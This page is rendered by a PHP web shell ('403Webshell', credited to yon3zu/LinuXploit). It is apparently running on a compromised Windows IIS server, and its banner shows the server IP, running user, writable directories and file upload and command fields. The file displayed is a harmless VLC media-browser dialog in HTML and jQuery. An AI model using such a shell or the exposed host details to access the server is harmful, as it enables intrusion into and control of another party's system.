403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.66
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/VideoLAN/VLC/lua/http/dialogs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/VideoLAN/VLC/lua/http/dialogs/browse_window.html
<script type="text/javascript">
//<![CDATA[
	var browse_target		=	'default';
	$(function(){
		$('#window_browse').dialog({
			autoOpen: false,
			width: 600,
			height: 650,
			modal: true,
			resizable: false,
			buttons: {
				"<?vlc gettext("Open") ?>":function(){
					$('li.ui-selected','#browse_elements').each(function(){
						$(this).dblclick();
					});
				},
				"<?vlc gettext("Enqueue") ?>": function() {
					$('li.ui-selected','#browse_elements').each(function(){
						var path	=	this.getAttribute('opendir') ? this.getAttribute('opendir') : this.getAttribute('openfile');
						switch(browse_target){
							default:
								sendCommand('command=in_enqueue&input='+encodeURI(path));
								setTimeout(function(){updatePlayList(true);},1000);
								break;
						}
					});
					$(this).dialog("close");
				},
				"<?vlc gettext("Cancel") ?>" : function(){
					$(this).dialog("close")
				}
			}
		});
	});
//]]>
</script>

<div id="window_browse" title="<?vlc gettext("Media Browser") ?>">
	<div style="height:500px;overflow: auto;">
		<ol id='browse_elements' selectable="selectable">
			<li><?vlc gettext("Play List") ?></li>
		</ol>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit